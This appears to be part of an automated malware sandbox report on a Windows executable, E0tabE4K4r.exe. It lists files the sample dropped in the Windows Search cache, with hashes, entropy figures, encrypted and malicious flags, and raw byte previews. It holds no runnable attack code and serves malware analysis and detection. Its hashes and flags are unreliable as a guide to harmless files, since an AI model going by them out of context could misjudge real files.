                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):70407
                                                                                                                                                  Entropy (8bit):7.997610455574137
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:+0RtSJv0EUyQpwYdavuLVnNWlZ0K4w5xZMXToioqpEEPGfxhhBrf:/7SJv0kzYdavu8aKh5/KpKT
                                                                                                                                                  MD5:393ABB91385AF909FC40072EE2065589
                                                                                                                                                  SHA1:368FB7D7CC15D0F32583356D382D8123318AD9E1
                                                                                                                                                  SHA-256:67FD31119ED4715DCA1B77C945B3990CB69E4451438989FED39F31CC69DE13AD
                                                                                                                                                  SHA-512:BD0A0735A054B4D63C23E2E0D8547DA4FA84E7EEB12E70C051F4BBAD31EB390C6947AB4F7E07B23A2399F5CC0F474BB5C2CAAFE3BA59CD723BE38188A8F6C714
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:var _.1..!f.HDI.$.uhDK..i%:....S...aK3.K...1.....U.7.}c....LdA#.........Z.....j...Q......[...........YT&K.......!.......b.....1G....#& .g.v.N6s..}..u.\..sL..r.....s..i.X.g.2..+k...w..9.......*d.....HFv.....8.j....8..-................5.Y..RVV.{..%.......6.0=4..|.V........=Ix......LS..&..[3.KE.uX.a..@w..;`.M...........18L...6......i$.P&.....|."6....h:.... ... .}..!..6.t..F3.$Z......'1....ll.4TG.!..-..w9.3.....*..S.l).....uhK.y.. ....h..;..wng.e.T..2....p.oI...c...kTC[.+P.9.~.i.(....$.:...5z....'._6J..8.w&$2........x.`..e..)..H...Q...K"` =.Bz.Y(.'......i^..1.>..C..D.....xu..kM.....P.....b.....K ...wm.#..<..,...y.....m...G....C....1.....;.7i.*.....).Q..^$..'.d.Y.Q...........p.8.4..:.jK.?....2`f..?5.....2.r...{E...1)'chy.+....X.fb....G....I.lm..Y....Y.,..G]...J.?h..N........._?.X3..L......fo........Qn`C.l..y.....%.....8..H.....=O.j..i..F..N..9.SEP.5:.].qu..?....7..mn.p.....t.n....9...R.N`.eP...\8...N....h.!H../...1B..........T.p....@.....+

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\PJOIJVPQ\th[1].png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):21870
                                                                                                                                                  Entropy (8bit):7.991213846592026
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:TLZKX99Lc3Y4RAr8l8UcsYz/lenqXxSsOt6rB8Z30xg16euDq7pD850v:XZKyTRArg/cfz/lGQ1lu30u163y5
                                                                                                                                                  MD5:96A87E43DEC399C87358774FA3F45F65
                                                                                                                                                  SHA1:93B5E362CF3CCFFD3EA6CE6E57AF96CA21405BBB
                                                                                                                                                  SHA-256:86428DE742581D5A1B2506A87EA7E2F06EF0D3FA7B38CAFB5B030AC0999F4BDA
                                                                                                                                                  SHA-512:B747FBED125ED3BD7C48E4239306B081385D47A1CFE14B3BD2E34334217687DE5312A0DEA6DCB60D6761B422EE0BCD920BD9DE20088856FBB191A09EC27E4D83
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:.PNG.C.......Z'X..9~".e..vS*D}V<.2..Fg.l3...{.l.4]....)+7..g...wu..^9.%&....~....r..nW..D\..o....)../g..c...:*.8....T.K9Zx...ho......n...m..tHj.|.&.G6.+.~...IN-A....n.)z@....7.....>{ o..p.s`.k..GY7.i.5..7.6.........Z..~.8E.\..'.4.C....,...+.@.X?.....q3z..K..AX.FH63+..^.`Q...$....b.^..s..\.....'.D.J..V..%g....K.X...6....m..]...CKRdC>=.%...Aj.....v..UGD....'q....;..^]...]4 .VN.B.L&.-.B..q...(V!..={...y5]w...`.....d.....(?...%.Ox....G...Ue..F..@O...p..>r..#:.4.V....\EW..E.N'.[..W.B...R.F..,I.@..b.]X.T..L}7..L.h..5.|.jRy...8.\ h.9oH.......g...wM ....E:#..k5v..P..M.sZ...?....q9.....b*.%#fO.x.\.....j..."H.......1....i.../1z.......m;K.d.eh.d".@?#A:e....g.SF6.h6....=.,J...}N.G:.YV+.:d....k..&..n7'.....yaP.%.I{s......Cs~.X(..SK.. .....x.....G....$\.J...'.._Ix=BB.M.M.i.X.h..........e...;.t.......1....:]/...p..dX.l}._.(N..L...,...^.c.1.J...Q....uU.h..OZ.........`.M?i..i.*....F...].{.|.j.'.).<^...E.....f..K....A...-l.n.\.G......M.s.8}"9.V~l.KdRt...

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\PJOIJVPQ\th[1].svg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):28781
                                                                                                                                                  Entropy (8bit):7.993502300988184
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:xfYYBCR6QXMG28rlh+yGy/WHcWh+mNymtQXWGYhA/:qNR28rlh+ry+Hc/mVJGkW
                                                                                                                                                  MD5:9F66BD0116E5C5B6679CB769E4F5F9FE
                                                                                                                                                  SHA1:C12B3EF55AB7A467F98722239DD3ADB04BC631A7
                                                                                                                                                  SHA-256:CA6A99FB3926424BA68C0A5328C7284ED424B0414DF6AA5193033DE616C28CCA
                                                                                                                                                  SHA-512:2F49434250043C5448479EDBF42AAF7DE4BF3549104696E247CBF1FD09E38286E32D03979D0DA49049796C83F53316197A0A732B37F5814B58C426E6C13807A5
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:<svg .$.eg...G..j.p.*4..^...H.!$.C.V.A...tA...\$.Kh.>..8...........Y....[=..K4..#..-...v.g.n.X..gd.......a... ,dlUa.).r..8.9.S..,.....{...#.aH.x0$s.)...+Q..X..........Sah.....9......6.c~.w`....=....Ka.V=.v.....>.o.~!....Io.'...RG..$.....O...g.....i.Kp".B._-..Rq....z.....u.c..i........v.r.U..1o..S7.7.|PR.&.$.p..X..........M.LsY..OQamy\h...Ro........#.G7.6T.Q.H.`!..+..I..d.C.Df.."m.81hz....g*..0.t..\...a.].-&....lMk.`Z.Dd.Z7.fY..V|!..-.P.7M2....cZ..K..i.....E.K.l..0v..A..B.....7H5,...../.C.B....ky....;.;_.B.A.G..1...9.Yq.....}z..W.....yc..YW.(..>!......f...Qlf........%./....Q@.M.w..@.<...4...[1....?.*..4.~..n....x&ps`5<r.B...%...._..V.......)O.X..V$i.5g...e.<..k.]..;p.&c...&.I..8h.=...kF........~....-....9...'+....5..@-..*.s...EAwO...i...I].....C...Yl.h..+....&:.=.X..Q.L...`;,a-7...W`...}."..........`.K+...{....V.F..+y._=i..........~..;...An|a[..H....iP.F#.xE.H.z<..@.9.@...HW...G.3.....0.}..)a'z|^.d..v..cP{MU..l.6......(....Y.0..M..'.d

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\PJOIJVPQ\th[2].png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):15938
                                                                                                                                                  Entropy (8bit):7.988878210032326
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:xtczaBqlXDwyU6d3Rry+ffv8nYBUaaLeeJZdeMRy4fKIOBAr:RqpDdH3Rrfv8YBUrJZHRy4fKVBAr
                                                                                                                                                  MD5:B61ADB44F9E713954355AE70CB30BFB9
                                                                                                                                                  SHA1:504CF05B614C5F91319E156809A514468D9451DB
                                                                                                                                                  SHA-256:4A87FC9EA446C77EF68042D34B792C32C6E2717FF08C11601C307B68E3EA265A
                                                                                                                                                  SHA-512:BA163DC7F291EA429CE332A2089134C8BBB8C2DEEB585B9E00F71839BF0C2D8C10138F02C91F30334A74DE2B264B0914A8BC9673493BD2FC2DBB450D834F1361
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG.....gD....}.........0..PK.X..E_.<......Y.A'.h5aM.<%f.?qG%...S..H.v.....M<j^.5=.l.S.qr.......Nw..;.=).z&.(0K........k.?...V.u.GB....Zv.....%..K..1.$HHx.iZ.O=R.w.yMwD..J..J.....^_>E.K........L.p..}..C..9.LN+4.V...Om<....U..6.@qU...{..jd.1...}.....b.SWB3...w.!.?..^9f.......T..RS'\.z.YB.w..b...'%.....\e...A..Z....V./..........Y...utzo.....'_.w..6.Z.T..;_......Y...~..._Le..-u....H..`.&OX.......,.......]....Y.`..(GS.G:..e.=...(.q......jV...u...A2.,..5...o8...%..P...s.n"............83.`..,.f.a.+.q..y...zY\r.N.)Xw..<.....G..T5......&.N...<..\....x.B{..o.....'x..|f...B{..XE.....$....A... ...^.S..7.;.z...,../..6...Z^..DX........>...E<...na.J-[..mI.....F0....Ut...."#.up..Bx.....:D...o. Z^R.+xLL.5[=..D.>.c.....*.......+bz.[...Ql..\.YMn....H...$.S.....T...V.......P.y!..._..L...u.v.-.jw._t5.@>..<Y..^2.@.Y.$..(...is.bTt..'...O..CtG......8cw..u......8.....$.....I...o....hf.)..z....0....'.ND.a5....NW..OV........U.v...X..U)).mo..|.%..j]....

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\PJOIJVPQ\trans[1].gif

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:GIF image data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):377
                                                                                                                                                  Entropy (8bit):7.434176483919018
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:Aw2cFSyJ6WV8702ADNWkHkCSMX5XiWwlypO11sXWgdJcjix+rsIo7nIS1WdNciik:lAtRADrHaMJT8cc1sF7cjYI5SUdNciik
                                                                                                                                                  MD5:EBD115ABDD5C1EFA8963DACB120AD7AF
                                                                                                                                                  SHA1:A58A70574C4A4DB6184AA1A5BAC6C890AA3F40B1
                                                                                                                                                  SHA-256:978869AB0072A145AE73700A3B17289DEDF8496E89A2019D05D9A2D901FE1214
                                                                                                                                                  SHA-512:CDC36E07B6C9FD13A217D09EECD38755E248F3AF1B3E7D8C3D60C46AC5936005BC1878BB3F9E04116AB1AAC71EA3FBA5D4FFE4F9E6A525D86C0E913A13676410
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:GIF896..r.....<..xH.M..........G..R'.>}....."..W.`.T<.I.y3...~.......h....'H}....I.~.K.;.....]..u ......]@....N..:..lr..d%(..`........_.......YyY.:...rLE..n...:.U..5{.A...m".0%......>..s...-.o.^A.....4G.6FA [. .z.V..)..,.......{v....7.....y.e+..Q.......i.:L!..s.;...=...DQ...l.]DmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\TXM4PK7R\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20594
                                                                                                                                                  Entropy (8bit):7.991739977784943
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:uwUiissEZOAKTMBilH/I5SiFMoy2v1f3w5HwjUhh1vBu7G:uFcs6OzMBfiozv1fg5HGgbvQ7G
                                                                                                                                                  MD5:CA599DD44A60605BEA58C1C62367119C
                                                                                                                                                  SHA1:3D3DAC9C902C17D1AF5CCB16FF30642231703F0C
                                                                                                                                                  SHA-256:80F24394CB9CEABF4566F6F034B7D4B46DD4610190F02983095CD37F2E6F73B8
                                                                                                                                                  SHA-512:F92C59C4008678CF2E1DA3C869A6266DA2E1357367F5631F2B1FBDF44D1DB1C00A81A7E57E44453F249EB49C680AC31C288A433FE999DC3FD5906E65DC07CD0C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:/*!Di\..D.......,z....*...(...l..-=G0. ..I`L.../l{....i...c...1....0._...FY......K.R..F..s.D..n..V..#....o..`.{;.Z....+]!...=.~*J.~?..(xW.....%..o~.l...Q.p..(m>.......|\..,3.........|"ddG.G.[...Qnmu.O.&Q.y..%.r.j..|a.nC#.....C..l...C...YK..TU...3.h.h1.....1....C..m...@.}.....9b....shV.B.ps~I..w....L.<e.YR.}N./.... s....&....L@..@...a3-.y.\..A..t.l..;...P..U.z....;.0...e.:#.VJ..7.^..U.W...2^..).......w`.7/K..a.l.DH.f...{.&..8C........I....=...`...Db.Q(R.c.yN}.0.\Ae...~]..v.z%.x........p_..gN......!I...<..zt*D..... .._|..>. ....o~?y..Sg..h...o..Y.L'.....=5B.31......~m..;.....>. .tO.3...5.`.r...%.........u....+0.K+P...2.X.Vm.O..yb..]....o......E.6!D.s]b;...._w$..l..*F...X~..]..'. ..j...Z,pqd.....92?Je...71..),.S...."......Jo..s.K.=...2>......GZ......\...!.r..`.......9..Cn5o-...(.....R........".n...[.P.|u....}:\}..9sa...<.|......].Z...k.9u..:...d.8Yj)...b]).M>..qu..y.....`klQ.T*k.y.1....[Q....NuTS9R....:n .....K.>....t...t..C.....v....g.F...[.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\TXM4PK7R\th[1].png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):22508
                                                                                                                                                  Entropy (8bit):7.992020851452121
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:lDJSnU3wX4tKkYu5zqXPK3EXSdcOqrJkhFS0lOzt8dKgTraovz3jjuA8:qdXPK3EXSOONk0gzWfjjuB
                                                                                                                                                  MD5:2D1558BAC28C2534FD5B8679888B3913
                                                                                                                                                  SHA1:E14BB0653554CFBFB42B36C8A7A3C81FCA27D688
                                                                                                                                                  SHA-256:304F6B12FC370DF204BBCC6DCDF12C79BF98EB52A15A213393107C83FF67D45D
                                                                                                                                                  SHA-512:4056A98E364866005210727831E899E005585D58A3F38822344B4FC7772FAE180DF019BC9B7EFAAB5FC8020B9C23AA9A80260BEAF339A0256D3CBC7739A3DE1B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:.PNG.l...w}...~.{...GR......=..*...j.bQ&.N.....pB.fU.+Y.x.V_.L.1....D.....%......>.|8...sZ..-..q..4.Jg..K....O...1.v%.(-......CMH.Y..^.D.I..v=..63........B;.....7..&.G..........q......'6..*.9...._.GV....m..jT..!.{.k1..9..S...v.9..:..S.....?Z........I.V...>.~.....l....#t..a..A..p...i..n..\t..nK.m.oD..Qm7......K..,~.AX^..M...(K.)*...8L..vZ.u[oW.?..l=?]n.9.u..i....J...N..........V}...h1.2.a.Z../..,+.i......^v.P...t.?.=..tL.?..U.9............m4D.(.._:....4K......q.Q....3q(.[...'.....\..=3..{..'D...)..\C.$..;}t#.ya.t.I.6..fs....*.&.#...3.........Q.e)._.n.a.l..c7.A.v......^_.8I.i.h..K....:S..u.BU[2."Y.Q.........d0...v.....4Xw.....C5T..@H.....J...*cR_,'@...%'.<\li.[...om.n$..b(.Nr9.?....X(.hj.2@=.;.....!.@...*....:Ge..5..l.n._.)+.*.....7M3....>$q.*I.0.!..]3.k.g.#.......r.".94...g>!V<..W./.n.....TCx..!9NE......T.^...#n...P/7.1i...J.u*F..p/.d(.Y....X.D.&.\2A..u$..yO%....$....F.b$$.n$..r.....h.$...C.@/.....6.....H.rj8...B/.ox....;s..WR.u.RH...M

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\TXM4PK7R\th[1].svg

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):28813
                                                                                                                                                  Entropy (8bit):7.9935388817178925
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:cRVxNAyGJr/A0KrCKRlwfDD29bQIJGVyV4P6f7r1fF671TWZ:cRjNAyA7aCnfn4bQzVuuYBfF67m
                                                                                                                                                  MD5:67F6636BE81CF83ECF81EF59D6571234
                                                                                                                                                  SHA1:CE854FF11DDB5DA26F0C3E69FBAF7F0CF8018211
                                                                                                                                                  SHA-256:6D712944EB33321603E20C1E1FAA493E86956F95E0273D30376EB655DBADDCA7
                                                                                                                                                  SHA-512:50EE72326399D5598E5B4A65FF574B14DED36F5F0945D39D7A2E8458F6E8DB838AFFA8137EA955252DD6F5AD0F42FE79FF851F10C86AB70665281C093E031924
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:<svg ..I.p%..`oj..*%4Dz..(~[UPa...8[.l%@.H.du...]..\..;.\/.b.j.A..s..c...F~e.L..i...*wSzig...+r.E.....i........x.....^oAO.niR._X....)6.zw...[.CB..&Bi.A.?.Iv...T..6...d.K...s......eF/.1..y.44.'e..h..K.F..v.+%bi..kP.....!.....o........>..w.2....."........o..E.xc..w1.....B....n.C...n....DbD...#6H..^..A.NEu...$..g.Z6.`.....q;.T....Bs.[.....!.H.L..._..1.L...s..O.y`.........m.+.&e........m.*.FS...Hz..=..U1...G....;...T'.:.=......T.7.6X.....%.1....Q>......[ld ...A0..J.R......Q.....K.D2.....1..H<.c*.4:......HL..=9...j...3f7.h..p.....C:..(I1.R^..Fa"k.A...z.....R1t#mU...8..87.'.#.....D.t....d....&...t.."..#.,.).....i..4.8.0...Z.M..,....FuO...rZ.0E...$.x.~thLhEi...E....}../...u.A.*G.......8....3..$D..._.-.l.x.khtxQ*..Bf...A..../......6..>.Y........e.W.q.JHV..q<.+a6..\A..>.Z.Q.v.... ....~..u..........1.<.q.A.......%....Z...8_....N..og+,..@....0....X......c.....R....F...(..(+.x1...:M.SnY.tuz.H.a.F2.[....>..0.].0..=....:..6S.d.. .g8..).)...$./...5.I

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\TXM4PK7R\th[2].png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):14817
                                                                                                                                                  Entropy (8bit):7.988566459676553
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:v24wsQnApQigZYXK/ZzDPa7+8ZffiKEybrtWE:v24wsQn8QDZYUDPa7BJBlWE
                                                                                                                                                  MD5:0E0F268132541AB9CD502F3ECA8D688F
                                                                                                                                                  SHA1:1372ECFB11B3781AE10E0B89C28BEB401FC049D2
                                                                                                                                                  SHA-256:798BFC16651D8A2E6D7025E36D3266466DCD3BF91CDDB0C057EB4CF55ABBF562
                                                                                                                                                  SHA-512:8ECC1F2C3274651E24D051CC3A96271CF7B91E061F134D534989C8A415782D71469473737C8DC0E427635148A207F70491EE9A79E85BF845D5DB2A5F976183A9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG.".y .).....C..O.v.9........4.v...m4m...C.|.\.yP.Cy...N.F.1..*H...W.q.....ZL5.p.D-F|.....t.U#.?.9....B...(.....e.b9..j...;......W....ZIv^l.,.1h.=..:..X6-j(.u.[..,.+...g.V.......r3.3Ga5K.5.d2.u.....O.G.....6...RL..4.w.:.y.8..M..QB....V..'..(u.?..3..q..y....f/.p.....8.?R..SU..0..5..7....M..NC..X,HUs.......h.;...3eJ..r..D.O.r......@..Q...B .......vK,......F.F..u.9.N...jt...\%r>c..*.C.......9.c..ht.E.z..w._...>,r..B}$...j.G...rhK.d$.g...q......S.OP?:........-0.f*W`1.........F.$...StW2..(Yj<....-;.NW[w....g..S.b...w.....E%RtYE..=......}..y..)p}.R(....Z+w.N-...N...1.g.Wy...5-..r...4.H...l....PB@.u..WF3...o..q.I.jY'..Ah..D...j.p..{&......"2/..e..EbGE..x=c.~.\.=L..V.Jx._.....,....c....8.."\...n..........(..c.s...B^.L3....!...Zf....8.W9Z.$...]~Cb.....H....N....8..&...EF.,#....t...L<..nDc........B.e}Z].r..&.]..V...w...%..x~....?...*.O?......@../....x...9...)...jr...^......l!.d.|.....Q..p.x..b.5C.K..t..BR/.L]...8.K..W.+..V..S.Fl.+RX.:...q...F6..d;M

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\TXM4PK7R\th[3].png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):18845
                                                                                                                                                  Entropy (8bit):7.990689540277529
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:wlcP8QTiTkTG5AMXU7EhjFKeLqXyaAySaa7QP4A:bATkq5A2U78pLqC6RT
                                                                                                                                                  MD5:1B3BBF0168E3E89EEF32EA0CE37C1A6F
                                                                                                                                                  SHA1:969B130317205ED7E14DA09AC27735D20EBBBA4B
                                                                                                                                                  SHA-256:161B77F34CBBD411AD2DE79722B707DED6DE02CBB498889B6CC66E2ADC7C16CE
                                                                                                                                                  SHA-512:AB1E11A5D9BC174DE1A75FFEF23ED6C266C370A82B0503CD7C33D8798E0B9369754B93F4E187E3146B3DDA22E632D0C878A97BAE5A09E2AC27070B00755189A3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:.PNG..8)....N...W.6..2...*....$ .:.."...u..f..C...}.._....p...y.2.Y?.X<.-8.L......V..rMz.e.......z.sEqB...,.......q......OC.z..Fa.cl..q}.K..w{..*.ID...._.0.3.]..U=.......-...}.z\ ..%F.....N}.<.&._.......i.....-..\.......K.uY.....-z......+R...fXIv.<...?.:.....2..Q..~CnB.8..5B..6_].>......4.(....2.5.#.............(1\.\.8pk..Z../..............yT..Q..gB 5.^b.......R.......Wq...{.PL4.....H>c.0.G6...V..0H.ka.5t.>7.z....3\....{+..q;.X...".L.].n.XL.C.>y...*>..a..gI.0..B.fS.P.[%,O........h<.q,.g$.4.D...o+....=.......,....H.#.!n.^#.[....P^a...w.#.......,y..}.Z..&.+).0.>n.X.-U..@.#..5v..&.O..a$.g.)....}5..);,7............3.y.....)....Y....$...Yu.............s.....u~q..:.I9.;.G..$...??.....ns...{N.k....mi....J...z3q..C..6XN..nW..5....K..>..D..Bw..@.\......Vn........u7..IJ.+.*...-d.n...VH;.N.D...9...@.}^...[.........0...H.R}.oy.5l.x2G./..4g...*=..@.S...m.!...D..#.`..Ka*...CDjw..F...n........./.:...j..,.....##;.._.L.........Y'b..4rx....$k.0

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\EWLSADU7\www.bing[1].xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):48797
                                                                                                                                                  Entropy (8bit):7.996352638956025
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:LmHB6Eb4s0vsYn1rpwW7nL9Q2t4mLqEAchHQA8h2SWn1nLrC+PocqeH3LDxUy2uL:LGQEbNuxpvCmZAcBW/Wn1nIc3nh2qNnZ
                                                                                                                                                  MD5:2E5B94EB62503A8D087B67707D10E2CC
                                                                                                                                                  SHA1:DC0C3D9615624D067E403F2B1DAE257808FAD63C
                                                                                                                                                  SHA-256:42A755584E2B2C44515C750F4EE82DA20743D107BF2F905FB9665FCAB9DBBFF2
                                                                                                                                                  SHA-512:32D377D92D0FF756B59DE4667EBCB685CB1D9B3A6486648A830182CD5C7F54EF734AE8E8DA9A9A5112BF9C93956BB32615883B3C071AFB9E65126A581168A979
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:<root....r..2.....@....]...l."@.>r......u..P...5.?..z.C...7..;X.b..\<..h.....B.!G...@.3Z..!.7..f...2.u...w.-.1..U.f..h...{zs.....!.Y.-.JJL......%f...P....+....m;..W.D.H......m.=.1..W.O...,....H.hM..).K.n.?5..tHck.r....^1...S%.$.u.?.ERY8,s...t...f.|.....(.@V4.-.|I.)G.N`E.]....=.;...A......f.....E...i.wqd.^....k.&_..O..$.a...:..*q....T#k..~1...Z.~0.........2.o&.....;z...-R..oE.8..|....C ..N.tp<.v..L.my..F....kH..K.C.+.y.l.O.t.M.(......S..Q.....K....b..=....zq.j.a..LB..oI...Bc..../{....[...{...c...mY..J.D.L?.|{'....B.m...7....b{......7..~T..7.T?B.......[.mj....oq%..1..@.I.,U.q^.J..z..s.....*F.(R^.p.....fub.a.1A.lK$...d....".s.b.A...&..|G.V.N:... ..h..D.c.|R.;...."H`[K.M..f.8.%%.....]0D(....s.{..5..o..............pj.g..w6...]y.............]...wH'.q...5...._Qf.4.(#.y.J.....#2/;.4..Y..D..2.x0.`a..O=.ro92..[`..I.W..5....2.....'*..)..n\.].}Q7..r.....>At.j.'.~N.2:cme....7bD...~Fm.....Y."......N..=...Lqv.7@.s....;.U.ii....l!B:.>/2:....u.....2.K_.Y..W.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\95d9a2a97a42f02325559b453ba7f8fe839baa18.tbres

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3018
                                                                                                                                                  Entropy (8bit):7.938109244687542
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:X40+KncORCUd85tJ/IRDqSLG8xrlo9PcB+SyQ/bk0gM7Hc78i2CzgihUhpX7HseL:X40+0CUd8X6JiYho9UBMQTkb687ry7hb
                                                                                                                                                  MD5:D67B41A2B13A7D0E89F6235E4EE6DFFE
                                                                                                                                                  SHA1:23CEE02897D0C4995B5020D836B9AA284AE33E49
                                                                                                                                                  SHA-256:E1B94B734B8B804700EB93E2F1B381B9843B7EA61561AF5768655982BB9C0C7D
                                                                                                                                                  SHA-512:22668C715EE8442C7E30E35E87BD3C5D4052E948456CDFAA57C8598BF36387D79E5EE62CE2FCDE7D35C54D0683810444B8F3BD59393C3B2A6D5B71C3AE2F9E2E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:{.".T~..p.*..p..z..ES....[.Jl*.K..0.I.w.*....iCp.M<.{.y...D:c..t..ku>m(.......`.TJ......O..m...3g...H..o.....K...X.>l.>....D.t.>!......;[)....U.9k.Li>yCg..Cv.QOr].W...*fp...HC...z...VxC......O..'............_)a..Y. ..U|^^.KU..|....!.ro...........Q.Fr.........M....r\.c.hb....6..C.@AT/.c.1..h\........t..t...}Q.8u.|..%..}...<3...%X'.a...........\.{..W9.......?.^..G.w...O...8.wu.z.t,M&.R#G...S4.E.V{.(.7v.prd.9.h....c.a...Hm.j..a........YK?1.<..m...,?..75.I.6..9..U[r.$...JVM..1..?..Q.....f..T.{...6..]n..@P.C.%V..o....q.....I...Z{'..X....w.t.F.....<P~tS+7....C.\Mv.0...50$V)Q......-...H...8..r.Eu..n.-m.E...(Zh9....W.m.(!.i)nKU...N...0!...............?....j......K..^#.F`.0......UZ6.......|BB27G.S./.K9...B.s....*>..!....F.~...'....b>.[.]#.&.x..d!8.`.bsXK...M...vPz.|...2j.:..Ex=t.~=....R#.3E..-q.c.0N-..2Eop..W...v.Ss.......Y-..Oc.3....+Pd=a.J/.....U..X.`_..VS..A.r$...d.'.BD.....FK.v.Z...=...M.....;5s.C.k..+..;.]..y..1..c.iN...CbW..a.V..r.\a1..i...-#.......B

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2612
                                                                                                                                                  Entropy (8bit):7.923083167182262
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:+GiuOHsnXkEjTuhGZ4kDHwWywR79Dezna4P8Rtjg4O5tqELuD:+Giu6sUiikZ4kDHNR7JAfP00DLW
                                                                                                                                                  MD5:2FF6373028CADFE765BC1C711373BD5A
                                                                                                                                                  SHA1:BFC0A6AC07DAE5C35933798A21FF63A2A8D3D130
                                                                                                                                                  SHA-256:2F84F85271B889511BC9231D072AEED8CD9EC234AC4351765B312494706E0588
                                                                                                                                                  SHA-512:64A17077457C5EC2136595B6337F71D0E78FBB7070D838C6876EAEA22DDB32D93A076E3F1E989C6F936CF691169F1A9521FF9B328FFFA43DC880FD598051AB47
                                                                                                                                                  Malicious:false
